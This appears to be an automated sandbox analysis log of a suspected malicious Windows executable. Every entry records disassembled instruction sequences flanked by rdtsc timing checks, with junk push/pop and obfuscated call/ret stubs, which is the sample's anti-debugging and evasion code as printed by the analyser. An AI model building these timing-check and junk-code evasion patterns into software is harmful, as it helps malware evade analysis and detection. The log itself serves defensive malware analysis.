                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056600 second address: 1056617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7021h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056903 second address: 1056907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056A99 second address: 1056A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C11 second address: 1056C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C15 second address: 1056C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C1E second address: 1056C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D26 second address: 1056D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D31 second address: 1056D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D4A second address: 1056D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D50 second address: 1056D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC408FC8B06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D62 second address: 1056D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056D66 second address: 1056D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105701F second address: 1057038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC408FC701Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC408FC7016h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057173 second address: 1057177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057B65 second address: 1057BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC408FC7016h 0x0000000a popad 0x0000000b jmp 00007FC408FC7029h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FC408FC701Fh 0x00000017 jns 00007FC408FC701Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057D1C second address: 1057D5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FC408FC8B15h 0x0000001b jmp 00007FC408FC8B14h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10581BF second address: 10581C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B678 second address: 105B697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC408FC8B15h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BE16 second address: 105BE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102323F second address: 1023243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10637E4 second address: 10637E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063CBF second address: 1063CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063CC3 second address: 1063CF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Ah 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007FC408FC7026h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063E1F second address: 1063E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC408FC8B0Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FC408FC8B16h 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FC408FC8B06h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063E55 second address: 1063E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063FB2 second address: 1063FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jng 00007FC408FC8B06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063FC0 second address: 1063FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106748A second address: 1067497 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10675B5 second address: 10675BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC408FC7016h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067B4C second address: 1067B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067FBD second address: 1067FC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068FEE second address: 1068FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069097 second address: 106909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A29E second address: 106A2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2A4 second address: 106A2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2A8 second address: 106A2AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2AC second address: 106A2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FC408FC703Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC408FC7026h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A2D3 second address: 106A322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jng 00007FC408FC8B0Bh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC408FC8B08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D2C06h] 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A322 second address: 106A328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B885 second address: 106B8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 pushad 0x00000009 sub ebx, dword ptr [ebp+12465719h] 0x0000000f popad 0x00000010 push 00000000h 0x00000012 mov si, 4D7Ah 0x00000016 sub edi, dword ptr [ebp+122D1DDAh] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f add dword ptr [ebp+122D2435h], esi 0x00000025 pop edi 0x00000026 mov esi, dword ptr [ebp+122D2E36h] 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B60A second address: 106B614 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C2FE second address: 106C317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CDFC second address: 106CE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC408FC7016h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CE07 second address: 106CE29 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC408FC8B08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007FC408FC8B0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FC408FC8B06h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB76 second address: 106CB93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D74C second address: 106D756 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB93 second address: 106CB99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10710CD second address: 1071108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FC408FC8B0Fh 0x0000000b jns 00007FC408FC8B06h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov ebx, dword ptr [ebp+122D1D49h] 0x0000001c push 00000000h 0x0000001e cld 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D3383h] 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jbe 00007FC408FC8B06h 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB99 second address: 106CB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071108 second address: 107112B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC408FC8B0Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106CB9D second address: 106CBA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072185 second address: 10721A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10721A0 second address: 10721A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107507A second address: 107507F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10762D7 second address: 10762DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10770F7 second address: 10770FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10762DC second address: 10762F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC408FC7018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FC408FC7016h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077EDD second address: 1077EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10770FB second address: 107710B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC408FC7016h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077EE7 second address: 1077EF3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077EF3 second address: 1077F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7029h 0x00000009 popad 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D3CD9h], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FC408FC7018h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 clc 0x00000031 xchg eax, esi 0x00000032 jo 00007FC408FC7022h 0x00000038 jmp 00007FC408FC701Ch 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC408FC701Ah 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10771E6 second address: 1077201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007FC408FC8B0Ch 0x00000010 jns 00007FC408FC8B06h 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B1B9 second address: 107B25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 js 00007FC408FC702Eh 0x0000000d jg 00007FC408FC7028h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC408FC7018h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e call 00007FC408FC701Bh 0x00000033 mov dword ptr [ebp+12465719h], ecx 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c mov ebx, edx 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FC408FC7018h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jno 00007FC408FC702Dh 0x00000063 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B25A second address: 107B264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC408FC8B06h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C291 second address: 107C305 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 movzx eax, bx 0x0000000c mov dword ptr [ebp+122D1EBCh], ebx 0x00000012 popad 0x00000013 push 00000000h 0x00000015 call 00007FC408FC7027h 0x0000001a xor bl, FFFFFFE4h 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC408FC7018h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a or dword ptr [ebp+1244BA1Bh], edi 0x00000040 sub dword ptr [ebp+122D380Bh], edx 0x00000046 xchg eax, esi 0x00000047 jmp 00007FC408FC7022h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C305 second address: 107C30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C30A second address: 107C310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E2DC second address: 107E346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007FC408FC8B08h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 mov bx, di 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FC408FC8B08h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f push 00000000h 0x00000041 movzx ebx, ax 0x00000044 add ebx, 4335044Ah 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FC408FC8B10h 0x00000052 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E346 second address: 107E359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC701Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E359 second address: 107E382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC408FC8B1Eh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E382 second address: 107E39C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC7026h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E4F1 second address: 107E517 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC8B18h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E517 second address: 107E521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F39D second address: 107F3A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F3A3 second address: 107F3C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB50D second address: 10BB513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB513 second address: 10BB518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDBD9 second address: 10BDBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jne 00007FC408FC7016h 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDBF0 second address: 10BDBF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD43 second address: 10BDD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC408FC7016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD4F second address: 10BDD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FC408FC8B25h 0x0000000e jmp 00007FC408FC8B0Eh 0x00000013 jmp 00007FC408FC8B11h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC408FC8B14h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD92 second address: 10BDDAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC408FC7026h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDAE second address: 10BDDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDB4 second address: 10BDDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
